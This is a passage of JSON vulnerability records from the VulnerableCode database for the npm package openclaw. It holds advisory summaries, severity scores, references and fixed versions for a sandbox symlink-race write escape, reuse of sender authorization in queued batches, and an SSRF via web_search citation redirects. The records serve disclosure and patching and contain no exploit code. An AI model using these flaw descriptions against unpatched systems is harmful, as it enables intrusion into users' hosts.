-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkjm-wcmt-43br"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.8"}],"aliases":["CVE-2026-32921","GHSA-8g75-q649-6pv6"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-swjf-k83n-h7gf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/92085?format=json","vulnerability_id":"VCID-t2ve-xemk-mqa9","summary":"OpenClaw: OpenShell FS bridge writes stay pinned to the sandbox mount root\n## Summary\nOpenShell FS bridge writes stay pinned to the sandbox mount root \n\n## Affected Packages / Versions\n- Package: openclaw (npm)\n- Affected versions: <= 2026.4.21\n- Fixed version: 2026.4.22\n\n## Impact\nA time-of-check/time-of-use race around OpenShell sandbox filesystem writes could let a symlink swap redirect a write outside the intended local mount root.\n\n## Fix\nOpenShell write paths now validate the canonical target against the mount root, reject unsafe symlink parents and symlink leaves for writes, and use root-scoped write helpers before syncing to the remote sandbox.\n\n## Fix Commit(s)\n- 7be82d4fd1193bcb7e44ee38838f00bf924ffa76\n\n## Verification\n- The fix commit is contained in the public v2026.4.22 tag.\n- openclaw@2026.4.22 is published on npm and the compiled package contains the fix.\n- Focused regression coverage for this path passed before publication.\n\nThanks @VladimirEliTokarev for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44112","reference_id":"","reference_type":"","scores":[{"value":"0.00032","scoring_system":"epss","scoring_elements":"0.09643","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00032","scoring_system":"epss","scoring_elements":"0.09624","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11223","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44112"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/7be82d4fd1193bcb7e44ee38838f00bf924ffa76","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"8.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T17:25:18Z/"}],"url":"https://github.com/openclaw/openclaw/commit/7be82d4fd1193bcb7e44ee38838f00bf924ffa76"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wppj-c6mr-83jj","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"8.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T17:25:18Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wppj-c6mr-83jj"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44112","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44112"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-symlink-swap-race-condition-in-openshell-fs-bridge-writes","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"8.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T17:25:18Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-symlink-swap-race-condition-in-openshell-fs-bridge-writes"},{"reference_url":"https://github.com/advisories/GHSA-wppj-c6mr-83jj","reference_id":"GHSA-wppj-c6mr-83jj","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wppj-c6mr-83jj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114466?format=json","purl":"pkg:npm/openclaw@2026.4.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-ye4t-n6r3-67ab"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.22"}],"aliases":["CVE-2026-44112","GHSA-wppj-c6mr-83jj"],"risk_score":4.3,"exploitability":"0.5","weighted_severity":"8.6","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-t2ve-xemk-mqa9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89045?format=json","vulnerability_id":"VCID-t2yy-9ume-t7be","summary":"OpenClaw: Collect-mode queue batches could reuse the last sender authorization context\n## Summary\n\nCollect-mode queue batches could reuse the last sender authorization context.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.14`\n- Patched versions: `>= 2026.4.14`\n\n## Impact\n\nCollect-mode queued messages from different senders could be drained as one batch using the final sender's authorization context, allowing earlier messages to inherit a more privileged context.\n\n## Technical Details\n\nThe fix splits collect-mode batches by sender authorization context before dispatch, preserving each message's own trust state.\n\n## Fix\n\nThe issue was fixed in #66024. The first stable tag containing the fix is `v2026.4.14`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `43d4be902755c970b3d15608679761877718da69`\n- PR: #66024\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.14 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43535","reference_id":"","reference_type":"","scores":[{"value":"0.00026","scoring_system":"epss","scoring_elements":"0.07719","published_at":"2026-06-05T12:55:00Z"},{"value":"0.0003","scoring_system":"epss","scoring_elements":"0.08979","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0003","scoring_system":"epss","scoring_elements":"0.08998","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43535"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/43d4be902755c970b3d15608679761877718da69","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"7.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T12:07:14Z/"}],"url":"https://github.com/openclaw/openclaw/commit/43d4be902755c970b3d15608679761877718da69"},{"reference_url":"https://github.com/openclaw/openclaw/pull/66024","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/66024"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jwrq-8g5x-5fhm","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"7.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T12:07:14Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jwrq-8g5x-5fhm"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43535","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43535"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-authorization-context-reuse-in-collect-mode-queue-batches","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"7.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T12:07:14Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-authorization-context-reuse-in-collect-mode-queue-batches"},{"reference_url":"https://github.com/advisories/GHSA-jwrq-8g5x-5fhm","reference_id":"GHSA-jwrq-8g5x-5fhm","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jwrq-8g5x-5fhm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109967?format=json","purl":"pkg:npm/openclaw@2026.4.14","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.14"}],"aliases":["CVE-2026-43535","GHSA-jwrq-8g5x-5fhm"],"risk_score":3.4,"exploitability":"0.5","weighted_severity":"6.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-t2yy-9ume-t7be"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91408?format=json","vulnerability_id":"VCID-t8e5-163r-37hc","summary":"Duplicate Advisory: web_search citation redirect SSRF via private-network-allowing policy\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-g99v-8hwm-g76g. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw versions prior to 2026.3.1 contain a server-side request forgery vulnerability in web_search citation redirect resolution that uses a private-network-allowing SSRF policy. An attacker who can influence citation redirect targets can trigger internal-network requests from the OpenClaw host to loopback, private, or internal destinations.","references":[{"reference_url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-web-search-citation-redirect","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-web-search-citation-redirect"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31989","reference_id":"CVE-2026-31989","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31989"},{"reference_url":"https://github.com/advisories/GHSA-44c9